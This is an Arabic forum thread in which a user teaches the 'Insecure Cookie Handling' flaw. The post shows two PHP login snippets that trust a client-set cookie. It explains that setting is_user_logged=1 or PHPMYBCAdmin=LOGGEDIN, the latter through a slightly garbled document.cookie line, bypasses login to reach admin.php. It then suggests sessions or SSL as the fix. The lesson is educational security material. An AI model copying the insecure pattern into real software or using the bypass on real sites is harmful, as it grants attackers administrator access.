حالة الموضوع:
مغلق
  1. V!P-Hero

    V!P-Hero DeveloPer Plus

    الأنتساب:
    ‏27 مارس 2012
    المشاركات:
    138
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    18
    الإقامة:
    هنااااااك
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اللهم صل وسلم على سيدنا محمد وعلى آله وصحبه اجمعين

    اليوم درسنا عن ثغرات

    #Insecure Cookie Handling

    الكوكيز المحمية لابد ان ترسل من خلال SSL ويكمن الاكتشاف والتخطي من خلال وضع بروكسي لمشاهدة الطلبات

    ناخذ كود بسيط عشان توضح الصورة

    [PHP CODE] if($_POST['password'] == $thepass) {
    setcookie("is_user_logged","1");
    } else { die("Login failed!"); }
    ............ etc .................
    if($_COOKIE['is_user_logged']=="1")
    { include "admin.php"; else { die('not logged'); }[/PHP CODE]

    الان لو كتبنا is_user_logged في الكوكيز وحطينا قيمتها 1 راح نتخطى التسجيل ونتحول لصفحة admin
    ناخذ كود ثاني ونشوف

    [PHP CODE] if ($_COOKIE[PHPMYBCAdmin] == '') {[/PHP CODE][PHP CODE]
    if (!$_POST[login] == 'login') {
    die("Please Login:<BR><form method=post><input type=password
    name=password><input type=hidden value=login name=login><input
    type=submit></form>");
    } elseif($_POST[password] == $bcadminpass) {
    setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
    header("Location: admin.php"); } else { die("Incorrect"); }
    }[/PHP CODE]

    الكود السابق قابل للاستغلال لو خلينا الكوكي كالتالي

    كود PHP:
    "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie "1246371700; path=/"
    طريقة الاصلاح والترقيع
    استخدام SESSIONS بدل الكوكيز
    او نقلها عبر SSL
    الى هنا ينتهي الدرس القاكم في دروس اخرى باذن الله

     
  2. ♕| s c я є α м |♕

    ♕| s c я є α м |♕ IP: 90.148.234.7 مشرف

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    630
    الإعجابات المتلقاة:
    668
    نقاط الجائزة:
    93
    الإقامة:
    7
    رد: ثغرات الكوكيز Insecure Cookie Handling

    يعطيك الف الف عافيـه
     
  3. M4r7h

    M4r7h Developer

    الأنتساب:
    ‏18 مايو 2014
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ثغرات الكوكيز Insecure Cookie Handling

    مشششكؤر
     
  4. coiffa

    coiffa Developer

    الأنتساب:
    ‏1 يناير 2013
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ثغرات الكوكيز Insecure Cookie Handling

    موضوع اكثر من رائع
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة